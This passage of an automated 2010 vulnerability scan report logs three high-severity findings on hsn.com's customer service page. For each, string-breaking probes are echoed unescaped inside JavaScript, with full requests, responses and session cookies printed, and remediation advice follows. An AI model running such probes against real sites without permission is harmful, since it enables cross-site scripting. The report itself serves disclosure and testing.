Set-Cookie: customer=ksUrl=RVwtpbjDdY5%2bW9Wphwke9SnTqSux1ZyoKTQPzYbvJZk%2bS3P28VZzHv1DKWRE8Cbi0%2bf43wWRedlx84PHSSXVRkOUXAREsRGQ4kLtl8CWpiHZo7Ny973JCPB3o%2bLQBJye3tzF69C5bO421yv8%2bBi%2fKxF5fzZW0lbi4JQeipFIzM5nfH29l2hKpmWbpQn5gY06&Look_Up_=CE_1&email=&return_url=htyXWH4kfbv5bJkQkBDNfkO0DnUN%2bEByVJe8Jh8VArd2xhmnoeMM3obuvJTDfPZHsm1yp5oJIKs0KAJwoRpEJJlNYgZGi9B8fqgTrRQjIAJ8DKWfu9n8QQvpkbOBJi50EJI%2bl%2fIYxZ6rr%2f6jMAXxQ0XOi785%2bUBeIXEiQ1Mm1pRr%2b1lsB4F7AxKJpg24w4cDbtppLM40LL4%3d; domain=.hsn.com; path=/
Set-Cookie: sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: CustState=Now=12/10/2010 3:02:21 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTHID=5446F57C4D620D8653314A92D739E1B4; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 20:02:21 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 92127


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
/don not change this
url += "&url=" + encodeURI('http://www.hsn.com/cs/default.aspx?cm_sp=Global*TNL*Help&amp;cm_mmc=sharingsite*Facebook*articles*HSN_Customer_Service_Pageb2b5b';85b7ac1babf') + "&title=" + encodeURI('HSN Customer Service Page at HSN.com') + "&profile=AT&cmSpPage=articles&pageID=HSN Customer Service Page";
new Ajax.Updater($('BreadCrumbsShareP
...[SNIP]...

1.27. http://www.hsn.com/cs/default.aspx [cm_sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hsn.com
Path:   /cs/default.aspx

Issue detail

The value of the cm_sp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d48a3'%3b815da0e4ed7 was submitted in the cm_sp parameter. This input was echoed as d48a3';815da0e4ed7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cs/default.aspx?cm_sp=Global*TNL*Helpd48a3'%3b815da0e4ed7 HTTP/1.1
Host: www.hsn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; TLTSID=AD2EA45D444C5361509642BD6C0C11B2; __utmz=94391299.1292009442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); newAlerts=0; abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; TaazABUser=true; bandwidth=1484; customer=ksUrl=P8uIrOOpnufElB5p%2f3Qpx8DMkYnb0AloWJeRNCi8Q8BW7zdnvpco2w%3d%3d&Look_Up_=CE_1&email=; CoreAt=90028889=1|0|0|0|0|0|0|0|0|0|0|2|1|1292009445||&; sitesession=o=esearch; custPref=persistentBar=true; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; CustState=Now=12/10/2010 2:31:12 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; TLTHID=6D0DA2ED4147ED541EF2E8A9DEF34643; __utma=94391299.504240029.1292009442.1292009442.1292009442.1; __utmc=94391299; __utmv=94391299.B; __utmb=94391299.10.10.1292009442

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: customer=ksUrl=P8uIrOOpnufElB5p%2f3Qpx8DMkYnb0AloWJeRNCi8Q8BW7zdnvpco2w%3d%3d&Look_Up_=CE_1&email=&return_url=bK6pBIKW31dg5fHXHDFjksuiUW4Jkf9rNJyaguwg9UR9khn2%2fR4dBtb94Pki54rENOXlXhGTHJUKf6gGV%2bg2hA5okw9c8IIK0SqIY8TOLpGaDXWEDJ0dzg%3d%3d; domain=.hsn.com; path=/
Set-Cookie: sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:26 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTHID=62FC2DF94332D6B807D40BAB3606738C; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:25 GMT
Vary: Accept-Encoding
Content-Length: 91997


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
es/GetShareComponent.aspx?R=' + Math.floor(Math.random() * 1000); //don not change this
url += "&url=" + encodeURI('http://www.hsn.com/cs/default.aspx?cm_sp=Global*TNL*Helpd48a3';815da0e4ed7') + "&title=" + encodeURI('HSN Customer Service Page at HSN.com') + "&profile=AT&cmSpPage=articles&pageID=HSN Customer Service Page";
new Ajax.Updater($('BreadCrumbsShareP
...[SNIP]...

1.28. http://www.hsn.com/cs/default.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hsn.com
Path:   /cs/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11e3c'%3b3f84895d447 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 11e3c';3f84895d447 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cs/default.aspx?cm_sp=Global*TNL*Help&11e3c'%3b3f84895d447=1 HTTP/1.1
Host: www.hsn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; TLTSID=AD2EA45D444C5361509642BD6C0C11B2; __utmz=94391299.1292009442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); newAlerts=0; abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; TaazABUser=true; bandwidth=1484; customer=ksUrl=P8uIrOOpnufElB5p%2f3Qpx8DMkYnb0AloWJeRNCi8Q8BW7zdnvpco2w%3d%3d&Look_Up_=CE_1&email=; CoreAt=90028889=1|0|0|0|0|0|0|0|0|0|0|2|1|1292009445||&; sitesession=o=esearch; custPref=persistentBar=true; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; CustState=Now=12/10/2010 2:31:12 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; TLTHID=6D0DA2ED4147ED541EF2E8A9DEF34643; __utma=94391299.504240029.1292009442.1292009442.1292009442.1; __utmc=94391299; __utmv=94391299.B; __utmb=94391299.10.10.1292009442

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: customer=ksUrl=P8uIrOOpnufElB5p%2f3Qpx8DMkYnb0AloWJeRNCi8Q8BW7zdnvpco2w%3d%3d&Look_Up_=CE_1&email=&return_url=u8NOqS6gQ4UyTEF7IQeVhPVJTgNIyGCYIvfVuLCTaEDgdLZ0UkmuHF7FIHc4RMHLeCi6%2b2lDAhTDExZDNNGh48fmtl1Z6EP5hVOTLwWmmzoIvqGfgrhAvg%3d%3d; domain=.hsn.com; path=/
Set-Cookie: sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:54 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTHID=344A507E480595A038F60F93E28A7158; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:54 GMT
Vary: Accept-Encoding
Content-Length: 92007


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
tShareComponent.aspx?R=' + Math.floor(Math.random() * 1000); //don not change this
url += "&url=" + encodeURI('http://www.hsn.com/cs/default.aspx?cm_sp=Global*TNL*Help&amp;11e3c';3f84895d447=1') + "&title=" + encodeURI('HSN Customer Service Page at HSN.com') + "&profile=AT&cmSpPage=articles&pageID=HSN Customer Service Page";
new Ajax.Updater($('BreadCrumbsShar
...[SNIP]...

1.29. https://www.hsn.com/cs/default.aspx [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.hsn.com
Path:   /cs/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 927f7'%3ba06e1e092d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 927f7';a06e1e092d8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cs/default.aspx?927f7'%3ba06e1e092d8=1 HTTP/1.1
Host: www.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerhsn_https_pool=520426924.47873.0000; TaazABUser=true; cmRS=&t1=1292009455654&t2=1292009456970&t3=1292009472812&t4=-1&lti=1292009472811&ln=&hr=/100k-givaway_at-5167_xa.aspx%3Fnolnav%3D1&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=/cnt/shared/tnavv7.aspx&ho=ww62.hsn.com/cm%3F&ci=90028889&ul=http%3A//www.hsn.com/cnt/shared/tnavV7.aspx&rf=http%3A//blogs.hsn.com/; __utmv=94391299.B; sitesession=o=esearch; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; __utmz=94391299.1292009442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CoreAt=90028889=1|0|0|0|0|0|0|0|0|0|0|3|1|1292009445||&; TLTHID=50D51C6141D4048D3DAB44B6B7C991C7; customer=ksUrl=RVwtpbjDdY5%2bW9Wphwke9SnTqSux1ZyoKTQPzYbvJZk%2bS3P28VZzHv1DKWRE8Cbi0%2bf43wWRedlx84PHSSXVRkOUXAREsRGQ4kLtl8CWpiHZo7Ny973JCPB3o%2bLQBJye3tzF69C5bO421yv8%2bBi%2fKxF5fzZW0lbi4JQeipFIzM5nfH29l2hKpmWbpQn5gY06&Look_Up_=CE_1&email=; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; bandwidth=1484; CustState=Now=12/10/2010 2:31:30 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; custPref=persistentBar=true; __utma=94391299.504240029.1292009442.1292009442.1292009442.1; abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; __utmc=94391299; __utmb=94391299.20.10.1292009442; partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; newAlerts=0; TLTSID=AD2EA45D444C5361509642BD6C0C11B2;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: customer=ksUrl=RVwtpbjDdY5%2bW9Wphwke9SnTqSux1ZyoKTQPzYbvJZk%2bS3P28VZzHv1DKWRE8Cbi0%2bf43wWRedlx84PHSSXVRkOUXAREsRGQ4kLtl8CWpiHZo7Ny973JCPB3o%2bLQBJye3tzF69C5bO421yv8%2bBi%2fKxF5fzZW0lbi4JQeipFIzM5nfH29l2hKpmWbpQn5gY06&Look_Up_=CE_1&email=&return_url=4D4zDNLstM8JCGc4SkS8PZAFH%2f6ATWPFCJaENcFbS5R0Kev6K%2fRZpEyvMz1jgWKUuhpim5rFjhc5bYStQxeOfA%3d%3d; domain=.hsn.com; path=/
Set-Cookie: sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: CustState=Now=12/10/2010 3:00:45 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTHID=0532BE8B4CDFEC4606BF8490D5CB6566; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 20:00:45 GMT
Connection: close
Set-Cookie: BIGipServerhsn_https_pool=520426924.47873.0000; expires=Fri, 10-Dec-2010 20:05:45 GMT; path=/
Vary: Accept-Encoding
Content-Length: 93919


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
cnt/WebServices/GetShareComponent.aspx?R=' + Math.floor(Math.random() * 1000); //don not change this
url += "&url=" + encodeURI('http://https://www.hsn.com/cs/default.aspx?927f7';a06e1e092d8=1') + "&title=" + encodeURI('HSN Customer Service Page at HSN.com') + "&profile=AT&cmSpPage=articles&pageID=HSN Customer Service Page";
new Ajax.Updater($('BreadCrumbsShar
...[SNIP]...

Report generated by XSS.CX at Fri Dec 10 14:08:07 CST 2010.